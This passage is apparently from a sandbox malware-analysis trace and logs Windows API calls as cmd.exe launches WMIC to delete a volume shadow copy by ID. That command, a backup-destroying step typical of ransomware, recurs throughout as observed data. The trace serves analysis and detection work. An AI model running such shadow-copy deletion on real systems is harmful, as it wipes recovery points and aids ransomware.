lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x0, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.723] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x9, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.723] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x9, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.723] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x9, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.723] RegCloseKey (hKey=0x44) returned 0x0 [0091.723] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517440 [0091.723] srand (_Seed=0x5f517440) [0091.723] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" [0091.723] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" [0091.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a65c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.723] GetProcessHeap () returned 0x240000 [0091.723] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x25ab40 [0091.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0091.723] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0091.723] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.723] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0091.724] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0091.724] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0091.724] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0091.724] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0091.724] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0091.724] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0091.724] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0091.724] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0091.724] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0091.724] GetProcessHeap () returned 0x240000 [0091.724] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x259620 | out: hHeap=0x240000) returned 1 [0091.724] GetEnvironmentStringsW () returned 0x258b90* [0091.724] GetProcessHeap () returned 0x240000 [0091.724] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa94) returned 0x25ad60 [0091.724] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0091.724] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.724] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0091.724] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0091.724] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0091.724] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0091.724] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0091.724] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0091.724] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0091.724] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0091.724] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0091.724] GetProcessHeap () returned 0x240000 [0091.724] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x5c) returned 0x25b800 [0091.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf3f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf3f0, lpFilePart=0x1cf3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf3d0*="Desktop") returned 0x25 [0091.725] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0091.725] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf100 | out: lpFindFileData=0x1cf100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x25b870 [0091.725] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0091.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf100 | out: lpFindFileData=0x1cf100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x25b870 [0091.725] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0091.725] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0091.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf100 | out: lpFindFileData=0x1cf100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x25b870 [0091.725] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0091.725] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0091.725] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0091.726] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0091.726] GetProcessHeap () returned 0x240000 [0091.726] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ad60 | out: hHeap=0x240000) returned 1 [0091.726] GetEnvironmentStringsW () returned 0x25b870* [0091.726] GetProcessHeap () returned 0x240000 [0091.726] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25c360 [0091.726] FreeEnvironmentStringsW (penv=0x25b870) returned 1 [0091.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a65c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.726] GetProcessHeap () returned 0x240000 [0091.726] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b800 | out: hHeap=0x240000) returned 1 [0091.726] GetProcessHeap () returned 0x240000 [0091.726] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4016) returned 0x25ce50 [0091.726] GetProcessHeap () returned 0x240000 [0091.726] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe4) returned 0x259680 [0091.726] GetProcessHeap () returned 0x240000 [0091.726] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0091.726] GetConsoleOutputCP () returned 0x1b5 [0091.727] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a65bfe0 | out: lpCPInfo=0x4a65bfe0) returned 1 [0091.727] GetUserDefaultLCID () returned 0x409 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a657b50, cchData=8 | out: lpLCData=":") returned 2 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf500, cchData=128 | out: lpLCData="0") returned 2 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf500, cchData=128 | out: lpLCData="0") returned 2 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf500, cchData=128 | out: lpLCData="1") returned 2 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a66a740, cchData=8 | out: lpLCData="/") returned 2 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a66a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a66a460, cchData=32 | out: lpLCData="Tue") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a66a420, cchData=32 | out: lpLCData="Wed") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a66a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a66a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a66a360, cchData=32 | out: lpLCData="Sat") returned 4 [0091.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a66a700, cchData=32 | out: lpLCData="Sun") returned 4 [0091.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a657b40, cchData=8 | out: lpLCData=".") returned 2 [0091.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a66a4e0, cchData=8 | out: lpLCData=",") returned 2 [0091.728] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0091.729] GetProcessHeap () returned 0x240000 [0091.729] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20c) returned 0x2597e0 [0091.729] GetConsoleTitleW (in: lpConsoleTitle=0x2597e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0091.729] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0091.729] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0091.730] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0091.730] GetProcessHeap () returned 0x240000 [0091.730] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4012) returned 0x25ce50 [0091.730] GetProcessHeap () returned 0x240000 [0091.730] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0091.732] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0091.732] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0091.732] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0091.732] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0091.733] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0091.733] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0091.733] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0091.733] GetProcessHeap () returned 0x240000 [0091.733] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0) returned 0x259a00 [0091.733] GetProcessHeap () returned 0x240000 [0091.733] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x259ac0 [0091.736] GetProcessHeap () returned 0x240000 [0091.736] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9e) returned 0x259b20 [0091.737] GetConsoleTitleW (in: lpConsoleTitle=0x1cf410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.737] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.737] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.737] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cefa0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cef80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cef80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0091.738] GetProcessHeap () returned 0x240000 [0091.738] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x259bd0 [0091.738] GetProcessHeap () returned 0x240000 [0091.738] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe2) returned 0x259df0 [0091.738] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0091.738] GetProcessHeap () returned 0x240000 [0091.738] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x420) returned 0x241320 [0091.738] SetErrorMode (uMode=0x0) returned 0x8001 [0091.738] SetErrorMode (uMode=0x1) returned 0x0 [0091.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x241330, lpFilePart=0x1ceca0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x1ceca0*="wbem") returned 0x18 [0091.739] SetErrorMode (uMode=0x8001) returned 0x1 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x241320, Size=0x54) returned 0x241320 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x241320) returned 0x54 [0091.739] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x259ee0 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x259f30 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f30, Size=0x48) returned 0x259f30 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f30) returned 0x48 [0091.739] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a64f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.739] GetProcessHeap () returned 0x240000 [0091.739] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe8) returned 0x259f90 [0091.744] GetProcessHeap () returned 0x240000 [0091.744] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f90, Size=0x7e) returned 0x259f90 [0091.744] GetProcessHeap () returned 0x240000 [0091.744] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f90) returned 0x7e [0091.745] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.745] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x1cea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea10) returned 0x25a020 [0091.745] GetProcessHeap () returned 0x240000 [0091.746] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x2546c0 [0091.746] FindClose (in: hFindFile=0x25a020 | out: hFindFile=0x25a020) returned 1 [0091.746] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0091.746] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0091.746] GetConsoleTitleW (in: lpConsoleTitle=0x1cef60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.746] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ced18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cecd8 | out: lpAttributeList=0x1ced18, lpSize=0x1cecd8) returned 1 [0091.746] UpdateProcThreadAttribute (in: lpAttributeList=0x1ced18, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ced18, lpPreviousValue=0x0) returned 1 [0091.746] GetStartupInfoW (in: lpStartupInfo=0x1cee30 | out: lpStartupInfo=0x1cee30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0091.746] GetProcessHeap () returned 0x240000 [0091.746] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x20) returned 0x2546f0 [0091.746] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0091.746] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0091.746] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0091.746] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0091.747] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0091.748] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0091.748] GetProcessHeap () returned 0x240000 [0091.748] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2546f0 | out: hHeap=0x240000) returned 1 [0091.748] GetProcessHeap () returned 0x240000 [0091.748] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x258a30 [0091.748] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0091.749] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ced50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ced00 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete", lpProcessInformation=0x1ced00*(hProcess=0x54, hThread=0x50, dwProcessId=0xae8, dwThreadId=0xab8)) returned 1 [0091.758] CloseHandle (hObject=0x50) returned 1 [0091.758] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0091.758] GetProcessHeap () returned 0x240000 [0091.758] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25c360 | out: hHeap=0x240000) returned 1 [0091.758] GetEnvironmentStringsW () returned 0x25ad60* [0091.758] GetProcessHeap () returned 0x240000 [0091.758] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25b850 [0091.758] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0091.758] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0093.164] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cec48 | out: lpExitCode=0x1cec48*=0x0) returned 1 [0093.164] CloseHandle (hObject=0x54) returned 1 [0093.164] _vsnwprintf (in: _Buffer=0x1ceeb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cec58 | out: _Buffer="00000000") returned 8 [0093.164] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0093.164] GetProcessHeap () returned 0x240000 [0093.164] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b850 | out: hHeap=0x240000) returned 1 [0093.164] GetEnvironmentStringsW () returned 0x25ad60* [0093.164] GetProcessHeap () returned 0x240000 [0093.165] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0093.165] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0093.165] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.165] GetProcessHeap () returned 0x240000 [0093.165] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b880 | out: hHeap=0x240000) returned 1 [0093.165] GetEnvironmentStringsW () returned 0x25ad60* [0093.165] GetProcessHeap () returned 0x240000 [0093.165] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0093.165] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0093.165] GetProcessHeap () returned 0x240000 [0093.165] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x258a30 | out: hHeap=0x240000) returned 1 [0093.165] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ced18 | out: lpAttributeList=0x1ced18) [0093.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.165] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a64e194 | out: lpMode=0x4a64e194) returned 1 [0093.166] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.166] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a64e198 | out: lpMode=0x4a64e198) returned 1 [0093.166] SetConsoleInputExeNameW () returned 0x1 [0093.166] GetConsoleOutputCP () returned 0x1b5 [0093.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a65bfe0 | out: lpCPInfo=0x4a65bfe0) returned 1 [0093.166] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0093.166] exit (_Code=0) Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x2e48000" os_pid = "0xae8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xa64" cmd_line = 